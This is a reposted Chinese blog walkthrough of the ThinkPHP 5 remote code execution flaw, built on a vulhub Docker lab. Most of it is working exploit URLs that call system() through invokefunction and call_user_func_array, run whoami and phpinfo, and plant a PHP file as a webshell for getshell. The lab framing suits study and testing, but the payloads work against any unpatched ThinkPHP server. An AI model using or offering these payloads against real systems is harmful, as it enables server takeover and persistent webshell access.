当前位置: 首页 > news >正文

Thinkphp(TP)框架漏洞攻略

news 2025/7/1 11:43:03

1.环境搭建

vulhub/thinkphp/5-rce

docker-compose up -d

 2.访问靶场

远程命令执行:

? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=whoami 

远程代码执行:

 ? s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[ 1][]=-1

3.Getshell

? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=echo "<?php phpinfo();?>" >>1.php

方式二: 利用工具

http://www.dtcms.com/a/87026.html

相关文章:

  • Docker 可视化工具 Portainer
  • 【2025】基于springboot+spark的电影推荐系统(源码、万字文档、图文修改、调试答疑)
  • 【Tomcat】部署及优化
  • 阿里云国际站代理商:怎样针对4G/5G网络优化CDN参数?
  • Pyserial库使用
  • 蓝桥杯学习-14子集枚举,二进制枚举
  • 高速电路设计之电源分类及其应用要点
  • netplan是如何操控systemd-networkd的? 笔记250324
  • 深入理解Spring框架:核心概念与组成剖析
  • Android第六次面试总结(okhttp篇)
  • Proteus8打开Proteus7文件(.DSN格式)的方法
  • Ceph集群2025(Squid版)导出高可用NFS集群(下集 )
  • 如何在多个GPU中训练非常大的模型?
  • 【编程】面向对象编程和函数式编程
  • 手撕C++ STL list容器:从指针缠绕到迭代器封装的实践笔记
  • 【大模型】DeepSeek攻击原理和效果解析
  • dify0.15.3升级至dify1.1.2操作步骤
  • 【DFS】羌笛何须怨杨柳,春风不度玉门关 - 4. 二叉树中的深搜
  • 高效PDF翻译解决方案:多引擎支持+格式零丢失
  • Android第六次面试总结(Java设计模式篇一)
  • Harbor镜像仓库迁移与高可用集群搭建实战指南
  • 在Centos 7环境下安装MySQL
  • C++11 auto decltype
  • 未来工程项目管理新走向:云原生软件赋能绿色可持续建设
  • 【申论】二十大报告中的申论金词金句
  • 【AI News | 20250324】每日AI进展
  • 大数据学习(82)-数仓详解
  • 【Ratis】SlideWindow滑动窗口机制
  • unity动效扫光教程
  • Linux应用:异步IO、存储映射IO、显存的内存映射